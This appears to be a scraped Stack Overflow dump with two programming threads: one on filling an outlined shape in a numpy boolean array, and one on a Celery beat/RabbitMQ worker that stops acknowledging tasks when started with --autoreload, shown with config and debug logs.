<pre><code>array([[True, True, True, False, False, False, False, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, False, False, False, False, True, True, True]])
</code></pre>
<p>(The 9 <code>True</code> values in a square in the middle of this array should become <code>False</code>.)</p>
<p>Is there a numpy slice method that will make this easy/fast? Something that I can modify all <code>True</code>s anytime there's a <code>False</code> followed by a <code>True</code> until the next instance of a <code>False</code>?</p>
| 2 | 2016-09-27T19:36:24Z | 39,733,198 | <p>Based on your logic, you can replace all values between the first False and the last False with False:</p>
<pre><code>import numpy as np

def mutate(A):
    ind = np.where(~A)[0]
    if len(ind) != 0:
        A[ind.min():ind.max()] = False
    return A

np.apply_along_axis(mutate, 1, arr)
# array([[ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True],
# [ True, True, True, False, False, False, False, False, True,
# True, True]], dtype=bool)
</code></pre>
| 0 | 2016-09-27T19:52:00Z | [
"python",
"arrays",
"performance",
"numpy"
]
|
Numpy array manipulation within range of columns and rows | 39,732,957 | <p>I have a numpy boolean 2D array that represents a grayscale image which is essentially an unfilled shape (triangle, square, circle) consisting of <code>True</code> for white pixels, and <code>False</code> for black pixels. I would like to add a black fill by modifying the white pixels to black pixels.</p>
<pre><code>array([[True, True, True, False, False, False, False, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, True, True, True, False, True, True, True],
[True, True, True, False, False, False, False, False, True, True, True]])
</code></pre>
<p>(The 9 <code>True</code> values in a square in the middle of this array should become <code>False</code>.)</p>
<p>Is there a numpy slice method that will make this easy/fast? Something that I can modify all <code>True</code>s anytime there's a <code>False</code> followed by a <code>True</code> until the next instance of a <code>False</code>?</p>
| 2 | 2016-09-27T19:36:24Z | 39,733,436 | <p>Here's one idea that's easy to implement and should perform reasonably quickly.</p>
<p>I'll use 0s and 1s so it's a little clearer to look at.</p>
<p>Here's the starting array:</p>
<pre><code>>>> a
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1]])
</code></pre>
<p>Accumulate left-to-right using <code>np.logical_and.accumulate</code>, flip left-to-right, do the same again, flip back, and then "or" the two arrays together:</p>
<pre><code>>>> andacc = np.logical_and.accumulate
>>> (andacc(a, axis=1) | andacc(a[:, ::-1], axis=1)[:, ::-1]).astype(int)
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1]])
</code></pre>
<p>(Leave out <code>.astype(int)</code> to keep a boolean array instead of 0s and 1s.)</p>
<p>Here's a triangle:</p>
<pre><code>>>> b
array([[1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 1],
[1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0]])
>>> (andacc(b, axis=1) | andacc(b[:, ::-1], axis=1)[:, ::-1]).astype(int)
array([[1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
</code></pre>
| 1 | 2016-09-27T20:08:52Z | [
"python",
"arrays",
"performance",
"numpy"
]
|
Celery Beat - Worker Consuming Messages, But Never Acks Them | 39,732,967 | <p>I've got a simple Django site that I'd like to add some scheduled tasks to via Celery / RabbitMQ. I'm stuck, because, while the beat scheduler pumps out tasks with no issues, the worker fails to consume them. The worker never marks them as acknowledged in RabbitMQ.</p>
<p>Here's my Celery configuration from <code>ego.settings</code>:</p>
<pre><code>from celery.schedules import crontab
...
# Celery configuration
BROKER_URL = os.environ.get('BROKER_URL', 'amqp://guest:guest@localhost:5672')
CELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'disabled')
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
'account-notifications': {
'task': 'ego.celery.account_alerts',
'schedule': crontab(),
},
}
</code></pre>
<p>My celery entrypoint (<code>ego.celery</code>):</p>
<pre><code>from __future__ import absolute_import
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ego.settings')
from django.conf import settings
app = Celery('ego')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
@app.task
def account_alerts():
print("nothing here, yet")
</code></pre>
<p>No, I didn't forget <code>ego.__init__</code> :)</p>
<pre><code>from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
</code></pre>
<p>The logs from beat look normal, but the worker is very quiet.</p>
<p>Beat instance:</p>
<pre><code>$ celery -A ego beat -s /tmp/celerybeat-schedule
celery beat v3.1.23 (Cipater) is starting.
__ - ... __ - _
Configuration ->
. broker -> amqp://guest:**@localhost:5672//
. loader -> celery.loaders.app.AppLoader
. scheduler -> celery.beat.PersistentScheduler
. db -> /Users/pnovotnak/Documents/Cyrus/ego/ego/celerybeat-schedule
. logfile -> [stderr]@%INFO
. maxinterval -> now (0s)
[2016-09-27 19:14:07,463: INFO/MainProcess] beat: Starting...
[2016-09-27 19:14:07,486: INFO/MainProcess] Scheduler: Sending due task account-notifications (ego.celery.account_alerts)
</code></pre>
<p>Worker instance:</p>
<pre><code>$ celery --autoreload -A ego worker -l debug
[2016-09-27 19:14:59,626: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 19:14:59,630: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 19:14:59,630: DEBUG/MainProcess] | Worker: New boot order: {Beat, Timer, Hub, Queues (intra), Pool, Autoreloader, StateDB, Autoscaler, Consumer}
[2016-09-27 19:14:59,645: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 19:14:59,646: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 19:14:59,652: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Events, Heart, Mingle, Gossip, Agent, Tasks, Control, event loop}
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Autoreloader
[2016-09-27 19:14:59,655: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 19:14:59,655: DEBUG/MainProcess] | Consumer: Starting Connection
[2016-09-27 19:14:59,663: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'product': 'RabbitMQ', 'platform': 'Erlang/OTP', 'version': '3.6.5', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'cluster_name': 'rabbit@d78e61a6690d', 'capabilities': {'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'per_consumer_qos': True, 'basic.nack': True, 'direct_reply_to': True, 'connection.blocked': True, 'consumer_priorities': True, 'publisher_confirms': True, 'consumer_cancel_notify': True}}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 19:14:59,664: DEBUG/MainProcess] Open OK!
[2016-09-27 19:14:59,664: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 19:14:59,664: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,664: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 19:14:59,673: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'product': 'RabbitMQ', 'platform': 'Erlang/OTP', 'version': '3.6.5', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'cluster_name': 'rabbit@d78e61a6690d', 'capabilities': {'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'per_consumer_qos': True, 'basic.nack': True, 'direct_reply_to': True, 'connection.blocked': True, 'consumer_priorities': True, 'publisher_confirms': True, 'consumer_cancel_notify': True}}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 19:14:59,674: DEBUG/MainProcess] Open OK!
[2016-09-27 19:14:59,674: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 19:14:59,675: DEBUG/MainProcess] Channel open
[2016-09-27 19:14:59,676: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,677: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 19:14:59,678: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:14:59,679: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 19:14:59,679: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 19:14:59,679: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 19:14:59,680: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,694: INFO/MainProcess] mingle: all alone
[2016-09-27 19:15:00,695: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,695: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 19:15:00,695: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 19:15:00,696: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,700: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,701: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 19:15:00,704: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,704: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 19:15:00,704: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 19:15:00,705: DEBUG/MainProcess] Channel open
[2016-09-27 19:15:00,708: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 19:15:00,708: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 19:15:00,709: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 19:15:00,709: DEBUG/MainProcess] | Worker: Hub.register Autoreloader...
</code></pre>
<p>Here's the RabbitMQ admin view:</p>
<p><a href="http://i.stack.imgur.com/BldOa.png" rel="nofollow"><img src="http://i.stack.imgur.com/BldOa.png" alt="rabbitmq admin interface screenshot"></a></p>
<p>And that's it. Nothing after that. Obligatory additional software versions:</p>
<ul>
<li>RabbitMQ 3.6.5 (Erlang 19.0.7)</li>
<li>Python 3.5.2</li>
</ul>
<p>And finally, the contents of one of the queued messages:</p>
<pre><code>{
"args": [],
"callbacks": null,
"chord": null,
"errbacks": null,
"eta": null,
"expires": null,
"id": "c474852a-dd60-4027-959d-5a9436337b17",
"kwargs": {},
"retries": 0,
"task": "ego.celery.account_alerts",
"taskset": null,
"timelimit": [
null,
null
],
"utc": true
}
</code></pre>
| 0 | 2016-09-27T19:37:09Z | 39,734,068 | <p>I've found the solution! It's the <code>--autoreload</code> flag. Don't use it.</p>
<p>Lesson #2: Run celery by hand, not via invoke as I was doing. This just makes your life harder by doing bad things to the log output.</p>
<p>It seems the <code>--autoreload</code> flag causes the worker to break for some reason. Here's a comparison of the logs with the flag present / not.</p>
<p>In the following outputs I've changed the task to <code>return "nothing here, yet"</code> rather than <code>print()</code> it.</p>
<p>With <code>--autoreload</code>:</p>
<pre><code>$ celery --autoreload -A ego worker -l debug
[2016-09-27 20:43:15,106: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 20:43:15,109: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 20:43:15,110: DEBUG/MainProcess] | Worker: New boot order: {Timer, Hub, Queues (intra), Pool, Autoscaler, Autoreloader, Beat, StateDB, Consumer}
[2016-09-27 20:43:15,115: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 20:43:15,115: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 20:43:15,122: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Events, Mingle, Tasks, Control, Agent, Gossip, Heart, event loop}
-------------- celery@Slug.local v3.1.23 (Cipater)
---- **** -----
--- * *** * -- Darwin-16.0.0-x86_64-i386-64bit
-- * - **** ---
- ** ---------- [config]
- ** ---------- .> app: ego:0x10486f748
- ** ---------- .> transport: amqp://guest:**@localhost:5672//
- ** ---------- .> results: disabled://
- *** --- * --- .> concurrency: 8 (prefork)
-- ******* ----
--- ***** ----- [queues]
-------------- .> celery exchange=celery(direct) key=celery
[tasks]
. celery.backend_cleanup
. celery.chain
. celery.chord
. celery.chord_unlock
. celery.chunks
. celery.group
. celery.map
. celery.starmap
. ego.celery.account_alerts
. ledger.tasks.AccountAlerts
[2016-09-27 20:43:15,125: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 20:43:15,125: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,125: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 20:43:15,409: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Worker: Starting Autoreloader
[2016-09-27 20:43:15,410: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 20:43:15,410: DEBUG/MainProcess] | Consumer: Starting Connection
[2016-09-27 20:43:15,420: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'capabilities': {'per_consumer_qos': True, 'direct_reply_to': True, 'basic.nack': True, 'consumer_priorities': True, 'publisher_confirms': True, 'authentication_failure_close': True, 'connection.blocked': True, 'consumer_cancel_notify': True, 'exchange_exchange_bindings': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'version': '3.6.5', 'product': 'RabbitMQ', 'cluster_name': 'rabbit@d78e61a6690d', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'platform': 'Erlang/OTP'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:43:15,422: DEBUG/MainProcess] Open OK!
[2016-09-27 20:43:15,422: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 20:43:15,422: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,422: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 20:43:15,429: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'capabilities': {'per_consumer_qos': True, 'direct_reply_to': True, 'basic.nack': True, 'consumer_priorities': True, 'publisher_confirms': True, 'authentication_failure_close': True, 'connection.blocked': True, 'consumer_cancel_notify': True, 'exchange_exchange_bindings': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'version': '3.6.5', 'product': 'RabbitMQ', 'cluster_name': 'rabbit@d78e61a6690d', 'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'platform': 'Erlang/OTP'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:43:15,430: DEBUG/MainProcess] Open OK!
[2016-09-27 20:43:15,431: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:43:15,433: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:15,433: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:15,433: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 20:43:15,434: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 20:43:15,434: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:43:15,435: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,445: INFO/MainProcess] mingle: all alone
[2016-09-27 20:43:16,445: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,445: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 20:43:16,451: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,451: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 20:43:16,451: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 20:43:16,452: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,455: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,456: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 20:43:16,456: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 20:43:16,456: DEBUG/MainProcess] Channel open
[2016-09-27 20:43:16,467: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,467: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 20:43:16,468: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:43:16,469: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 20:43:16,470: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 20:43:16,470: DEBUG/MainProcess] | Worker: Hub.register Autoreloader...
^C
worker: Hitting Ctrl+C again will terminate all running tasks!
worker: Warm shutdown (MainProcess)
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Hub...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Pool...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Autoreloader...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Closing Consumer...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Worker: Stopping Consumer...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Connection...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Events...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Mingle...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Tasks...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Control...
[2016-09-27 20:44:33,368: DEBUG/MainProcess] | Consumer: Closing Gossip...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Closing Heart...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Closing event loop...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping event loop...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping Heart...
[2016-09-27 20:44:33,369: DEBUG/MainProcess] | Consumer: Stopping Gossip...
[2016-09-27 20:44:33,372: DEBUG/MainProcess] Closed channel #3
[2016-09-27 20:44:33,373: DEBUG/MainProcess] | Consumer: Stopping Control...
[2016-09-27 20:44:33,374: DEBUG/MainProcess] Closed channel #2
[2016-09-27 20:44:33,374: DEBUG/MainProcess] | Consumer: Stopping Tasks...
[2016-09-27 20:44:33,374: DEBUG/MainProcess] Canceling task consumer...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Mingle...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Events...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Consumer: Stopping Connection...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Worker: Stopping Autoreloader...
[2016-09-27 20:44:33,375: DEBUG/MainProcess] | Worker: Stopping Pool...
[2016-09-27 20:44:34,388: DEBUG/MainProcess] | Worker: Stopping Hub...
[2016-09-27 20:44:34,388: DEBUG/MainProcess] | Consumer: Shutdown Heart...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Gossip...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Control...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Tasks...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] Canceling task consumer...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] Closing consumer channel...
[2016-09-27 20:44:34,389: DEBUG/MainProcess] | Consumer: Shutdown Events...
[2016-09-27 20:44:34,390: DEBUG/MainProcess] Closed channel #1
[2016-09-27 20:44:34,391: DEBUG/MainProcess] | Consumer: Shutdown Connection...
[2016-09-27 20:44:34,392: DEBUG/MainProcess] Closed channel #1
[2016-09-27 20:44:34,396: DEBUG/MainProcess] removing tasks from inqueue until task handler finished
</code></pre>
<p>Without <code>--autoreload</code> (note the "redelivered" status of the first two tasks):</p>
<pre><code>$ celery -A ego worker -l debug
[2016-09-27 20:44:42,075: DEBUG/MainProcess] | Worker: Preparing bootsteps.
[2016-09-27 20:44:42,079: DEBUG/MainProcess] | Worker: Building graph...
[2016-09-27 20:44:42,080: DEBUG/MainProcess] | Worker: New boot order: {Timer, Hub, Queues (intra), Pool, Autoscaler, Autoreloader, Beat, StateDB, Consumer}
[2016-09-27 20:44:42,087: DEBUG/MainProcess] | Consumer: Preparing bootsteps.
[2016-09-27 20:44:42,088: DEBUG/MainProcess] | Consumer: Building graph...
[2016-09-27 20:44:42,101: DEBUG/MainProcess] | Consumer: New boot order: {Connection, Agent, Events, Mingle, Gossip, Heart, Tasks, Control, event loop}
-------------- celery@Slug.local v3.1.23 (Cipater)
---- **** -----
--- * *** * -- Darwin-16.0.0-x86_64-i386-64bit
-- * - **** ---
- ** ---------- [config]
- ** ---------- .> app: ego:0x10516f710
- ** ---------- .> transport: amqp://guest:**@localhost:5672//
- ** ---------- .> results: disabled://
- *** --- * --- .> concurrency: 8 (prefork)
-- ******* ----
--- ***** ----- [queues]
-------------- .> celery exchange=celery(direct) key=celery
[tasks]
. celery.backend_cleanup
. celery.chain
. celery.chord
. celery.chord_unlock
. celery.chunks
. celery.group
. celery.map
. celery.starmap
. ego.celery.account_alerts
. ledger.tasks.AccountAlerts
[2016-09-27 20:44:42,105: DEBUG/MainProcess] | Worker: Starting Hub
[2016-09-27 20:44:42,105: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,105: DEBUG/MainProcess] | Worker: Starting Pool
[2016-09-27 20:44:42,387: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,387: DEBUG/MainProcess] | Worker: Starting Consumer
[2016-09-27 20:44:42,388: DEBUG/MainProcess] | Consumer: Starting Connection
[2016-09-27 20:44:42,398: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'capabilities': {'publisher_confirms': True, 'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'consumer_priorities': True, 'per_consumer_qos': True, 'consumer_cancel_notify': True, 'direct_reply_to': True, 'basic.nack': True, 'connection.blocked': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'platform': 'Erlang/OTP', 'cluster_name': 'rabbit@d78e61a6690d', 'product': 'RabbitMQ', 'version': '3.6.5'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:44:42,399: DEBUG/MainProcess] Open OK!
[2016-09-27 20:44:42,399: INFO/MainProcess] Connected to amqp://guest:**@127.0.0.1:5672//
[2016-09-27 20:44:42,400: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,400: DEBUG/MainProcess] | Consumer: Starting Events
[2016-09-27 20:44:42,408: DEBUG/MainProcess] Start from server, version: 0.9, properties: {'copyright': 'Copyright (C) 2007-2016 Pivotal Software, Inc.', 'capabilities': {'publisher_confirms': True, 'authentication_failure_close': True, 'exchange_exchange_bindings': True, 'consumer_priorities': True, 'per_consumer_qos': True, 'consumer_cancel_notify': True, 'direct_reply_to': True, 'basic.nack': True, 'connection.blocked': True}, 'information': 'Licensed under the MPL. See http://www.rabbitmq.com/', 'platform': 'Erlang/OTP', 'cluster_name': 'rabbit@d78e61a6690d', 'product': 'RabbitMQ', 'version': '3.6.5'}, mechanisms: ['PLAIN', 'AMQPLAIN'], locales: ['en_US']
[2016-09-27 20:44:42,409: DEBUG/MainProcess] Open OK!
[2016-09-27 20:44:42,409: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:44:42,412: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:42,412: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:42,412: DEBUG/MainProcess] | Consumer: Starting Mingle
[2016-09-27 20:44:42,412: INFO/MainProcess] mingle: searching for neighbors
[2016-09-27 20:44:42,413: DEBUG/MainProcess] using channel_id: 1
[2016-09-27 20:44:42,426: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,445: INFO/MainProcess] mingle: all alone
[2016-09-27 20:44:43,445: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,445: DEBUG/MainProcess] | Consumer: Starting Gossip
[2016-09-27 20:44:43,445: DEBUG/MainProcess] using channel_id: 2
[2016-09-27 20:44:43,446: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,450: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,450: DEBUG/MainProcess] | Consumer: Starting Heart
[2016-09-27 20:44:43,451: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,451: DEBUG/MainProcess] | Consumer: Starting Tasks
[2016-09-27 20:44:43,456: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,456: DEBUG/MainProcess] | Consumer: Starting Control
[2016-09-27 20:44:43,456: DEBUG/MainProcess] using channel_id: 3
[2016-09-27 20:44:43,457: DEBUG/MainProcess] Channel open
[2016-09-27 20:44:43,460: DEBUG/MainProcess] ^-- substep ok
[2016-09-27 20:44:43,460: DEBUG/MainProcess] | Consumer: Starting event loop
[2016-09-27 20:44:43,461: WARNING/MainProcess] celery@Slug.local ready.
[2016-09-27 20:44:43,462: DEBUG/MainProcess] | Worker: Hub.register Pool...
[2016-09-27 20:44:43,462: DEBUG/MainProcess] basic.qos: prefetch_count->32
[2016-09-27 20:44:43,463: INFO/MainProcess] Received task: ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13]
[2016-09-27 20:44:43,463: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': True, 'priority': 0}, 'correlation_id': 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'bc4c5b05-6306-4a57-b1a0-eca1e9282c13', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:44:43,465: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13] pid:63322
[2016-09-27 20:44:43,478: INFO/MainProcess] Task ego.celery.account_alerts[bc4c5b05-6306-4a57-b1a0-eca1e9282c13] succeeded in 0.013773033046163619s: 'nothing here, yet'
[2016-09-27 20:44:45,458: INFO/MainProcess] Received task: ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22]
[2016-09-27 20:44:45,459: DEBUG/MainProcess] TaskPool: Apply <function _fast_trace_task at 0x105263950> (args:('ego.celery.account_alerts', 'b7673a47-dd76-4f1d-b414-03744fcfac22', [], {}, {'is_eager': False, 'delivery_info': {'exchange': 'celery', 'routing_key': 'celery', 'redelivered': True, 'priority': 0}, 'correlation_id': 'b7673a47-dd76-4f1d-b414-03744fcfac22', 'expires': None, 'chord': None, 'task': 'ego.celery.account_alerts', 'timelimit': [None, None], 'callbacks': None, 'headers': {}, 'utc': True, 'errbacks': None, 'eta': None, 'kwargs': {}, 'args': [], 'hostname': 'celery@Slug.local', 'taskset': None, 'group': None, 'retries': 0, 'id': 'b7673a47-dd76-4f1d-b414-03744fcfac22', 'reply_to': '656c174e-c251-3e02-8132-df741c11a046'}) kwargs:{})
[2016-09-27 20:44:45,461: DEBUG/MainProcess] Task accepted: ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22] pid:63327
[2016-09-27 20:44:45,462: INFO/MainProcess] Task ego.celery.account_alerts[b7673a47-dd76-4f1d-b414-03744fcfac22] succeeded in 0.0010689240298233926s: 'nothing here, yet'
[2016-09-27 20:45:00,002: INFO/MainProcess] Received task: ego.celery.account_alerts[2d464f3a-36f3-4f45-b303-aa477bc30545]
